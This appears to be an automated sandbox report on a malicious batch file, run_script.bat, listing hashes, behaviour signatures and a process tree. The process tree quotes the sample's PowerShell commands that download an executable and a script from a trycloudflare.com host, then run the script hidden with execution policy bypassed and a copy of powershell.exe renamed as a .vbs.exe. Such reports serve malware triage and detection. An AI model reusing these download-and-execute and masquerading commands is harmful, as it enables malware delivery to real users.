Analysis
  max time kernel: 94s
  max time network: 137s
  platform: windows10-2004_x64
  resource: win10v2004-20241007-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 13-11-2024 11:27
  Static task: static1
  Behavioral task: behavioral1
  Sample: run_script.bat
  Resource: win7-20240903-en
General
  Target: run_script.bat
  Size: 8KB
  MD5: 2efffa15097ea8c880a10b0fea32054e
  SHA1: f3e247d6aa4a2da2776a527e5ff7251576c1b260
  SHA256: ddf7f8e12308ee481e883416af7cc1a19e7ce5feee7a69b3267f9d40480fe7b6
  SHA512: caa107de8dd85690f576f01b69095f659465d6f7de8d079b06bb23dbf01c95e7e10d857535af2a523e42c8b6e775a8e819bb0413aa6a6b3c38c19f7ffcf88e76
  SSDEEP: 192:CincTy8G+hpQyuPmhDGEhtKCDw16/zbq/Z/+Hz6XlNnGwzA84q7YmvqMA0b:gTYcpQyuPmhDGEhtKCVa/k+vnGUA84yR
Malware Config
Signatures
Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 4632
  pid_target: 3392
  Process: cmd.exe
  procid_target: 94

Blocklisted process makes network request (5 IoCs)
Processes (flow, pid, Process):
  8   4704  powershell.exe
  18  1836  powershell.exe
  19  700   powershell.exe
  20  4500  powershell.exe
  21  5052  powershell.exe

Processes (pid, Process):
  4704  powershell.exe
  1836  powershell.exe
  700   powershell.exe
  4500  powershell.exe
  4704  powershell.exe
  1836  powershell.exe
  700   powershell.exe
  4500  powershell.exe
  5052  powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation
  Process: wscript.exe

Executes dropped EXE (2 IoCs)
Processes (pid, Process):
  1816  RunHiddenConsole.exe
  3112  reconstructed_script.vbs.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description: Key opened
  ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  Process: reconstructed_script.vbs.exe
Modifies registry class (1 IoCs)
Processes:
  description: Key created
  ioc: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
  Process: wscript.exe

Suspicious behavior: EnumeratesProcesses (12 IoCs)
Processes (pid, Process):
  4704  powershell.exe
  4704  powershell.exe
  1836  powershell.exe
  1836  powershell.exe
  700   powershell.exe
  700   powershell.exe
  4500  powershell.exe
  4500  powershell.exe
  5052  powershell.exe
  5052  powershell.exe
  3112  reconstructed_script.vbs.exe
  3112  reconstructed_script.vbs.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes (description, pid, Process):
  Token: SeDebugPrivilege  4704  powershell.exe
  Token: SeDebugPrivilege  1836  powershell.exe
  Token: SeDebugPrivilege  700   powershell.exe
  Token: SeDebugPrivilege  4500  powershell.exe
  Token: SeDebugPrivilege  5052  powershell.exe
  Token: SeDebugPrivilege  3112  reconstructed_script.vbs.exe

Suspicious use of WriteProcessMemory (17 IoCs)
Processes (description, pid, Process, procid_target):
  PID 1292 wrote to memory of 4704  1292  cmd.exe               84
  PID 1292 wrote to memory of 4704  1292  cmd.exe               84
  PID 1292 wrote to memory of 1836  1292  cmd.exe               88
  PID 1292 wrote to memory of 1836  1292  cmd.exe               88
  PID 1292 wrote to memory of 700   1292  cmd.exe               92
  PID 1292 wrote to memory of 700   1292  cmd.exe               92
  PID 1292 wrote to memory of 4500  1292  cmd.exe               95
  PID 1292 wrote to memory of 4500  1292  cmd.exe               95
  PID 1292 wrote to memory of 1816  1292  cmd.exe               96
  PID 1292 wrote to memory of 1816  1292  cmd.exe               96
  PID 1816 wrote to memory of 5052  1816  RunHiddenConsole.exe  97
  PID 1816 wrote to memory of 5052  1816  RunHiddenConsole.exe  97
  PID 5052 wrote to memory of 3544  5052  powershell.exe        108
  PID 5052 wrote to memory of 3544  5052  powershell.exe        108
  PID 3544 wrote to memory of 3112  3544  wscript.exe           111
  PID 3544 wrote to memory of 3112  3544  wscript.exe           111
  PID 3544 wrote to memory of 3112  3544  wscript.exe           111
Processes

[1] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\run_script.bat"
    - Suspicious use of WriteProcessMemory
    PID: 1292

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4704

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1836

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 700

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4500

    [2] C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe" powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        PID: 1816

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 5052

            [4] C:\Windows\system32\wscript.exe
                Command line: "C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs"
                - Checks computer location settings
                - Modifies registry class
                - Suspicious use of WriteProcessMemory
                PID: 3544

                [5] C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe
                    Command line: "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe" -enc 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
                    - Executes dropped EXE
                    - System Location Discovery: System Language Discovery
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                    PID: 3112

[1] C:\Windows\system32\cmd.exe
    Command line: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe" /Y
    - Process spawned unexpected child process
    PID: 4632
Network
MITRE ATT&CK Enterprise v15
Downloads